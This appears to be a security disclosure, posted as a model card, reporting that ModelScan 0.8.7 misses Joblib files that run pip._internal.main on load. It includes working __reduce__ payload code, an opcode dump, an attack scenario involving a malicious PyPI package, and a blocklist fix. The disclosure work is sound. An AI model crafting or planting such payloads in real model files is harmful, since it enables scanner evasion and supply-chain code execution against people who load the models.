---
license: mit
---
# HUNTR MFV SUBMISSION - ModelScan Joblib pip._internal Bypass

## Target Format
**Joblib**

## Title
**ModelScan Scanner Bypass via pip._internal.main() in Joblib Files - Missing Blocklist Entry**

## HuggingFace PoC
**https://huggingface.co/kfoughali/mfv-modelscan-joblib1**

Files:
- `scanner_bypass_poc.joblib` (64 bytes) - Safe demo: displays `pip install --help`
- `scanner_bypass_rce.joblib` (103 bytes) - RCE proof: downloads a file to `/tmp/joblib_rce_proof/`

---

## Vulnerability Summary

**Tested on:** ModelScan v0.8.7

ModelScan's CRITICAL blocklist of unsafe Pickle operations does not include `pip` or `pip._internal`. Because Joblib serializes objects with Pickle internally, the same gap applies to `.joblib` files.

A malicious Joblib file can:
- Pass ModelScan security checks, returning "No issues found"
- Execute arbitrary code during deserialization via `pip._internal.main(...)`
- Enable supply-chain attacks, since a malicious sklearn model is reported as clean

This is the same vulnerability class as **CVE-2025-1716** (picklescan `pip.main()` bypass), but it affects ModelScan.

---

## Proof of Bypass

### ModelScan Output (Both Files)

```
$ modelscan --version
modelscan, version 0.8.7

$ modelscan --path scanner_bypass_poc.joblib
Scanning scanner_bypass_poc.joblib using modelscan.scanners.PickleUnsafeOpScan
--- Summary ---
No issues were found!

$ modelscan --path scanner_bypass_rce.joblib
Scanning scanner_bypass_rce.joblib using modelscan.scanners.PickleUnsafeOpScan
--- Summary ---
No issues were found!
```

---

## Payloads

### PoC Payload (`scanner_bypass_poc.joblib`)

**Purpose:** Safe demonstration - displays pip install help text

```python
import joblib

class PipBypassPoC:
    def __reduce__(self):
        # Pickle stores a reference to the callable plus its arguments
        # and calls it when the file is loaded.
        from pip._internal import main
        return main, (['install', '--help'],)

joblib.dump(PipBypassPoC(), 'scanner_bypass_poc.joblib')
```

**Execution:**
```
$ python3 -c "import joblib; joblib.load('scanner_bypass_poc.joblib')"

Usage:
pip install [options] <requirement specifier> [package-index-options] ...
pip install [options] -r <requirements file> [package-index-options] ...
...
```
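The mechanism the PoC relies on can be seen with a harmless callable. The following is a minimal sketch and not part of the submitted PoC: the hypothetical class `ReduceDemo` returns the builtin `int` from `__reduce__`, so unpickling calls `int("42")` and hands back its result instead of a `ReduceDemo` instance. The PoC above does the same thing with `pip._internal.main` as the callable.

```python
import pickle


class ReduceDemo:
    """Hypothetical illustration class; a harmless stand-in for the PoC payload."""

    def __reduce__(self):
        # Pickle records (callable, args); the loader calls callable(*args).
        return int, ("42",)


def roundtrip():
    # Serialising stores a reference to builtins.int plus the argument tuple.
    data = pickle.dumps(ReduceDemo())
    # Deserialising invokes int("42") and returns whatever that call returns.
    return pickle.loads(data)


if __name__ == "__main__":
    print(roundtrip())
```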

---

### RCE Payload (`scanner_bypass_rce.joblib`)

**Purpose:** Proves code execution on load: the attacker-chosen pip command downloads a file to `/tmp/joblib_rce_proof/`

```python
import joblib

class PipBypassRCE:
    def __reduce__(self):
        from pip._internal import main
        return main, (['download', '--no-deps', '-d', '/tmp/joblib_rce_proof', 'pip'],)

joblib.dump(PipBypassRCE(), 'scanner_bypass_rce.joblib')
```

**Execution:**
```
$ rm -rf /tmp/joblib_rce_proof
$ python3 -c "import joblib; joblib.load('scanner_bypass_rce.joblib')"

Collecting pip
Downloading pip-25.3-py3-none-any.whl (1.8 MB)
Saved /tmp/joblib_rce_proof/pip-25.3-py3-none-any.whl
Successfully downloaded pip

$ ls /tmp/joblib_rce_proof/
pip-25.3-py3-none-any.whl
```

**The payload executes despite the "No issues found" scan result.**

---

## Pickle Opcodes (RCE Variant)

Abridged disassembly; the `FRAME`, `MEMOIZE`, and list/tuple construction opcodes between the listed offsets are omitted.

```
  0: \x80 PROTO            4
 11: \x8c SHORT_BINUNICODE 'pip._internal'          <- Module NOT in blocklist
 27: \x8c SHORT_BINUNICODE 'main'                   <- Function to call
 34: \x93 STACK_GLOBAL                              <- pip._internal.main
 39: \x8c SHORT_BINUNICODE 'download'
 50: \x8c SHORT_BINUNICODE '--no-deps'
 62: \x8c SHORT_BINUNICODE '-d'
 67: \x8c SHORT_BINUNICODE '/tmp/joblib_rce_proof'
 91: \x8c SHORT_BINUNICODE 'pip'
100: R    REDUCE                                    <- Execute pip._internal.main([...])
```
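A scanner can recover the imported callable from these opcodes without loading the file. The sketch below uses the standard-library `pickletools.genops`; the helper names `referenced_globals` and `short_str` are hypothetical, and resolving `STACK_GLOBAL` from the two most recent string arguments is a simplifying heuristic (it ignores memo lookups), not ModelScan's actual implementation. The sample stream is hand-built and only parsed, never unpickled.

```python
import pickletools


def referenced_globals(data: bytes):
    """List (module, name) pairs a pickle stream imports, without executing it."""
    found = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3 carry "module name" as one space-separated argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+: module and name are the two strings pushed just before.
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


def short_str(text: str) -> bytes:
    """Encode text as a SHORT_BINUNICODE opcode (0x8c, length byte, UTF-8)."""
    raw = text.encode("utf-8")
    return b"\x8c" + bytes([len(raw)]) + raw


# Hand-built stream: PROTO 4, two strings, STACK_GLOBAL, STOP.
SAMPLE = b"\x80\x04" + short_str("pip._internal") + short_str("main") + b"\x93."

if __name__ == "__main__":
    print(referenced_globals(SAMPLE))
```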

---

## ModelScan Blocklist Analysis

The current CRITICAL blocklist in `modelscan/settings.py` has no entry for `pip` or `pip._internal`:

```python
"CRITICAL": {
    "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"],
    "builtins": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"],
    "runpy": "*",
    "os": "*",
    "nt": "*",
    "posix": "*",
    "socket": "*",
    "subprocess": "*",
    "sys": "*",
    "operator": ["attrgetter"],
    "pty": "*",
    "pickle": "*",
    "_pickle": "*",
    "bdb": "*",
    "pdb": "*",
    "shutil": "*",
    "asyncio": "*",
    # "pip" is NOT here!
    # "pip._internal" is NOT here!
},
```
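Why the missing key matters can be modelled in a few lines. This is a simplified sketch that assumes the scanner looks up the module name as an exact dictionary key; `CRITICAL` is an excerpt of the list above, and `is_flagged` is a hypothetical helper, not ModelScan's code.

```python
# Excerpt of the CRITICAL blocklist shown above (not the full list).
CRITICAL = {
    "builtins": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"],
    "os": "*",
    "subprocess": "*",
    "operator": ["attrgetter"],
}


def is_flagged(module: str, name: str, blocklist: dict) -> bool:
    """Exact-match lookup: flag only if the module key exists and covers the name."""
    rule = blocklist.get(module)
    if rule is None:
        return False  # no key for this module, so nothing is reported
    return rule == "*" or name in rule


if __name__ == "__main__":
    # Covered by the "os" wildcard entry.
    print(is_flagged("os", "system", CRITICAL))
    # No key for this module in the excerpt.
    print(is_flagged("pip._internal", "main", CRITICAL))
```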

---

## Attack Scenario

1. The attacker publishes a malicious PyPI package whose build hooks run attacker code at install time:
   ```python
   # pyproject.toml or setup.py hooks can execute arbitrary code
   # Example: exfiltrate credentials, establish reverse shell, etc.
   ```

2. The attacker creates a Joblib file that calls `pip._internal.main(['install', 'malicious-pkg'])`.

3. The Joblib file passes ModelScan: **"No issues found! 🎉"**

4. The victim loads the sklearn model: `joblib.load('model.joblib')`.

5. **RCE achieved** via the pip install hooks.

---

## Impact

| Impact | Description |
|--------|-------------|
| **Scanner Bypass** | ModelScan 0.8.7 reports "No issues found" |
| **Code Execution** | Arbitrary code via pip install/download hooks |
| **Supply Chain** | Malicious sklearn models appear safe |
| **Wide Scope** | Affects all Joblib/sklearn model pipelines using ModelScan |

---

## Recommended Fix (Scanner-Side)

Add `pip` and `pip._internal` to the CRITICAL blocklist in `modelscan/settings.py`:

```python
"CRITICAL": {
    "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"],
    "builtins": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"],
    "runpy": "*",
    "os": "*",
    "nt": "*",
    "posix": "*",
    "socket": "*",
    "subprocess": "*",
    "sys": "*",
    "operator": ["attrgetter"],
    "pty": "*",
    "pickle": "*",
    "_pickle": "*",
    "bdb": "*",
    "pdb": "*",
    "shutil": "*",
    "asyncio": "*",
    "pip": "*",            # <-- ADD
    "pip._internal": "*",  # <-- ADD
},
```
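Both keys are listed on the assumption that module names are matched exactly, in which case an entry for `pip` alone would not cover `pip._internal`. An alternative design, sketched below with a hypothetical helper `module_is_blocked`, treats a blocklisted package as covering all of its submodules. This illustrates the idea only; it is not a description of how ModelScan behaves.

```python
def module_is_blocked(module: str, blocked_packages: set) -> bool:
    """Return True if the module or any of its parent packages is blocklisted."""
    parts = module.split(".")
    # For "pip._internal.cli" this checks "pip", "pip._internal", "pip._internal.cli".
    return any(
        ".".join(parts[:i]) in blocked_packages
        for i in range(1, len(parts) + 1)
    )


if __name__ == "__main__":
    blocked = {"pip", "os", "subprocess"}
    for candidate in ("pip", "pip._internal", "pip._internal.cli.main", "pipeline"):
        print(candidate, module_is_blocked(candidate, blocked))
```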

**Why this is the correct fix:**
1. Aligns with the fix applied in picklescan for CVE-2025-1716
2. Treats `pip._internal.main()` as a dangerous callable
3. Blocks both `pip.main` and `pip._internal.main` variants

---

## Why This Is Distinct from a Pickle Submission

| Aspect | Pickle (.pkl) | Joblib (.joblib) |
|--------|---------------|------------------|
| Scanner code path | `PickleUnsafeOpScan` on `.pkl` | `PickleUnsafeOpScan` on `.joblib` |
| Format detection | `SupportedModelFormats.PICKLE` | `SupportedModelFormats.JOBLIB` |
| Primary use case | Generic Python objects | **sklearn models** (ML industry standard) |
| Supply chain impact | General serialization | **ML model pipelines** specifically |

ModelScan explicitly supports Joblib as a distinct format. The `pip._internal` gap affects this scanner path.

---

## References

- CVE-2025-1716: https://nvd.nist.gov/vuln/detail/CVE-2025-1716
- GHSA-655q-fx9r-782v: https://github.com/advisories/GHSA-655q-fx9r-782v
- ModelScan: https://github.com/protectai/modelscan

---

**Researcher:** Karim Foughali
**Email:** kfoughali@dzlaws.org
**Date:** January 17th 2026